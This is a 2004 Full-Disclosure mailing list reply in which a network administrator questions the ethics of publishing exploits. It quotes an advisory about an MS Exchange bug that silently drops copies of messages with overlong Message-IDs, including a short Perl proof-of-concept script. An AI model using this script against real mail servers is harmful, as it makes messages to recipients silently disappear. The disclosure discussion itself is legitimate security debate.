I am using the following only as an example that has been slightly discussed here. The gentleman rightly posts and gives us the information that is very helpful to be aware of. But then posts the "exploit" example because, in his own words,
<|>I think some people know how to use this "FEATURE" ... I hope this post <|>will speed up the fix release! Exactly in what way do you think this should speed up the release? Granted, this is a "lost" email exploit. But what if it was a dangerous exploit? I have seen these also posted. I know of "script Kiddies" who would never be able to find the exploit but are part of the group who "know how to use this 'FEATURE'...". They watch here and others just for that purpose. Where is accountability? I am torn between this issue of needed knowledge and exposed exploit. As a network Administrator I have no need for the exploit but for the knowledge. I have found no better place then here for that. Then on the other hand you all give out the exploits for confirmation which is needed also. Just some of my personal inward ramblings. thank you Randall M <|>--__--__-- <|> <|>Message: 20 <|>Date: Wed, 12 May 2004 11:52:23 +0200 (MEST) <|>From: [EMAIL PROTECTED] <|>To: [EMAIL PROTECTED] <|>Subject: [Full-Disclosure] MS Exchange message lost <|> <|>* MS Exchange duplicate message fault (message lost) <|>* <|>* MS Exchange (all versions affected) duplicate message fault <|>* <|>* I discovered this bug independently on 10, 2003 <|>* <|>* public post 05, 2004 <|>* <|>* Helmut Schmitz < [EMAIL PROTECTED] > <|>* <|>* (c) 2003/2004 Copyright by Helmut Schmitz - HackForce.NET - */ <|> <|>MS Exchange Server (tested on 5.5 and 2003) has a bug ... If you send <|>Messages with long message ids (>189 bytes?)to more than one recipient <|>(cc), <|>the message will not delivered correctly ... there is no correct logging <|>!!, <|>the messages will be delivered to only one Recipient ... the message to <|>the <|>other will be lost !! <|> <|>I have send this issue to Microsoft (10.2003) ... some months later <|>(05.2004) I got the fix, but not public ... store.exe (6.5.6980.81) with <|>some reg settings fixes (workaround ;-) the problem. <|> <|>Perl Example (test exploit) ... <|> <|>#!/usr/bin/perl -w <|>use Net::SMTP; <|>$from = '[EMAIL PROTECTED]'; <|>$to = '[EMAIL PROTECTED]'; <|>$cc = '[EMAIL PROTECTED]'; <|>$subject = 'Test Email'; <|>$smtp = Net::SMTP->new('yourmailserver'); <|>$smtp->mail($from); <|>$smtp->to($to); <|>$smtp->cc($cc); <|>$smtp->data(); <|>$smtp->datasend("To: <$to>\n"); <|>$smtp->datasend("Cc: <$cc>\n"); <|>$smtp->datasend("From: <$from>\n"); <|>$smtp->datasend("Subject: $subject\n"); <|>$smtp->datasend("Message-ID: <|><veryverylongmessageid123ondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhte <|>ngeifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhteng <|>eifeejktmhedgedherngrondljzhngqwenfghnrjhgdlutjfohnfiztgefnuhderlhtengei <|>feejktmhedgedherngrondljzhng> \n"); <|>$smtp->datasend("Hallo\n"); <|>$smtp->datasend("123\n"); <|>$smtp->datasend("123\n"); <|>$smtp->datasend("123\n"); <|>$smtp->dataend(); <|>$smtp->quit; <|> <|>Background: <|>Duplicate detection is decided by three factors. These are MessageID, <|>RootFID (the root folder ID of the mailbox) and the SubmitTime into the <|>store. These are used to build a unique key when the message is <|>submitted. <|>If all the factors are the same value, then we recognize the message as <|>duplicate. <|> <|>################################### <|> <|>I think some people know how to use this "FEATURE" ... I hope this post <|>will speed up the fix release! <|> <|>Regards, <|>Helmut Schmitz _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html